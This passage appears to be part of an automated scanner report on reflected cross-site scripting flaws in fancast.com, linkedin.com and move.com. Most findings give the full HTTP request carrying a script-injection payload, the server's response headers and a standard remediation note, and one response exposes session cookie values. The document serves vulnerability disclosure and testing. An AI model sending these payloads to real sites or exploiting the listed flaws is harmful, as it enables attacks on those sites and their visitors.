This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-newsc1276"><script>alert(1)</script>51691943018/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:25 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:24 GMT Content-Length: 37716
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4706c</script><script>alert(1)</script>3b5c0ada87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news4706c</script><script>alert(1)</script>3b5c0ada87/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:32 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:31 GMT Content-Length: 37741
2.488. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 551ef</script><script>alert(1)</script>15d6e4aece9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/?551ef</script><script>alert(1)</script>15d6e4aece9=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:23 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:22 GMT Content-Length: 37761
2.489. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d1b6"><script>alert(1)</script>1c40cfdcbef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d1b6\"><script>alert(1)</script>1c40cfdcbef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/?6d1b6"><script>alert(1)</script>1c40cfdcbef=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:13 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:12 GMT Content-Length: 37731
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe7a"><script>alert(1)</script>34a967e9376 was submitted in the REST URL parameter 3. This input was echoed as 2fe7a\"><script>alert(1)</script>34a967e9376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news2fe7a"><script>alert(1)</script>34a967e9376/survivor-hall-of-fame-inductee-sandra-diaz-twine/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:07 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:07 GMT Content-Length: 39713
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>'Survivor' Hall of Fame Inductee ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news2fe7a\"><script>alert(1)</script>34a967e9376/survivor-hall-of-fame-inductee-sandra-diaz-twine/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47f95</script><script>alert(1)</script>4bbacd01e03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news47f95</script><script>alert(1)</script>4bbacd01e03/survivor-hall-of-fame-inductee-sandra-diaz-twine/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:13 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:12 GMT Content-Length: 39743
2.492. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae508</script><script>alert(1)</script>f5d2040ce27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/?ae508</script><script>alert(1)</script>f5d2040ce27=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:06 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:06 GMT Content-Length: 39758
2.493. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7f0e"><script>alert(1)</script>c253a99a9d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7f0e\"><script>alert(1)</script>c253a99a9d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/?c7f0e"><script>alert(1)</script>c253a99a9d9=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:01 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:00 GMT Content-Length: 39728
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>'Survivor' Hall of Fame Inductee ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/?c7f0e\"><script>alert(1)</script>c253a99a9d9=1"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db16b</script><script>alert(1)</script>bb947937378 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-newsdb16b</script><script>alert(1)</script>bb947937378/survivor-nicaragua-power-rankings-the-final-round/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:26 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:25 GMT Content-Length: 40446
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a0e"><script>alert(1)</script>c57b34cc2a7 was submitted in the REST URL parameter 3. This input was echoed as c6a0e\"><script>alert(1)</script>c57b34cc2a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-newsc6a0e"><script>alert(1)</script>c57b34cc2a7/survivor-nicaragua-power-rankings-the-final-round/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:22 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:21 GMT Content-Length: 40416
2.496. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b521</script><script>alert(1)</script>66ddcc76bc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/?8b521</script><script>alert(1)</script>66ddcc76bc5=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:20 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:20 GMT Content-Length: 40461
2.497. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fb5"><script>alert(1)</script>ef00ad01530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fb5\"><script>alert(1)</script>ef00ad01530 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/?61fb5"><script>alert(1)</script>ef00ad01530=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:14 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:14 GMT Content-Length: 40431
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164a6"><script>alert(1)</script>937cc1681ae was submitted in the REST URL parameter 3. This input was echoed as 164a6\"><script>alert(1)</script>937cc1681ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news164a6"><script>alert(1)</script>937cc1681ae/the-good-wife-gets-social-in-facebook-stunt-episode/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:09 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:09 GMT Content-Length: 39334
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>'The Good Wife' Gets 'Social' in ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news164a6\"><script>alert(1)</script>937cc1681ae/the-good-wife-gets-social-in-facebook-stunt-episode/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf913</script><script>alert(1)</script>94b5713e6aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-newsbf913</script><script>alert(1)</script>94b5713e6aa/the-good-wife-gets-social-in-facebook-stunt-episode/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:14 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:14 GMT Content-Length: 39364
2.500. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a07eb</script><script>alert(1)</script>7b0144ebf8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/?a07eb</script><script>alert(1)</script>7b0144ebf8f=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:08 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:08 GMT Content-Length: 39379
2.501. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 620ec"><script>alert(1)</script>3408254d490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 620ec\"><script>alert(1)</script>3408254d490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/?620ec"><script>alert(1)</script>3408254d490=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:03 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:03 GMT Content-Length: 39349
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>'The Good Wife' Gets 'Social' in ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/?620ec\"><script>alert(1)</script>3408254d490=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f76'-alert(1)-'d08bd5a452d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /secureb0f76'-alert(1)-'d08bd5a452d/login HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:UgyXg1WuPy0OUWtkWxVSxZHOuDzOudwZpDwXxQtPAvAXtepKZEc3Mj:1292784122:c49f58f2ca243e9673ded51ddc8b5afa43f50a04"; Version=1; Max-Age=1799; Expires=Sun, 19-Dec-2010 19:12:01 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:7623969433150988835"; Version=1; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Set-Cookie: bcookie="v=1&f0fc9de9-9802-4f8e-9c5e-af6a6a3dec82"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 06-Jan-2079 21:56:09 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 990 Date: Sun, 19 Dec 2010 18:42:01 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 19-Dec-2010 19:11:45 GMT;path=/;httponly
2.503. http://www.move.com/trends/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.move.com
Path:
/trends/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4aa3</script><script>alert(1)</script>bba5a26af0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/?a4aa3</script><script>alert(1)</script>bba5a26af0a=1 HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2224f</script><script>alert(1)</script>9ab7277185f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/celebrity-real-estate-highlights-362224f</script><script>alert(1)</script>9ab7277185f/ HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
s.prop27="trends.move.com"; s.prop26= 'Not Registered'; var s_code=s.t(); if(s_code ...[SNIP]...
2.505. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.move.com
Path:
/trends/celebrity-real-estate-highlights-36/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e836</script><script>alert(1)</script>d3eadce974c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/celebrity-real-estate-highlights-36/?6e836</script><script>alert(1)</script>d3eadce974c=1 HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b28ce</script><script>alert(1)</script>6cdcf29f70b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/charity-gifts-for-christmasb28ce</script><script>alert(1)</script>6cdcf29f70b/ HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
s.prop27="trends.move.com"; s.prop26= 'Not Registered'; var s_code=s.t(); if(s_code ...[SNIP]...
2.507. http://www.move.com/trends/charity-gifts-for-christmas/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.move.com
Path:
/trends/charity-gifts-for-christmas/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c082d</script><script>alert(1)</script>23f54655df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/charity-gifts-for-christmas/?c082d</script><script>alert(1)</script>23f54655df=1 HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987be</script><script>alert(1)</script>509f8e09b6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/holiday-gifts-for-the-cat-lover987be</script><script>alert(1)</script>509f8e09b6e/ HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
s.prop27="trends.move.com"; s.prop26= 'Not Registered'; var s_code=s.t(); if(s_code ...[SNIP]...
2.509. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.move.com
Path:
/trends/holiday-gifts-for-the-cat-lover/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b77bc</script><script>alert(1)</script>0f5df801394 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/holiday-gifts-for-the-cat-lover/?b77bc</script><script>alert(1)</script>0f5df801394=1 HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
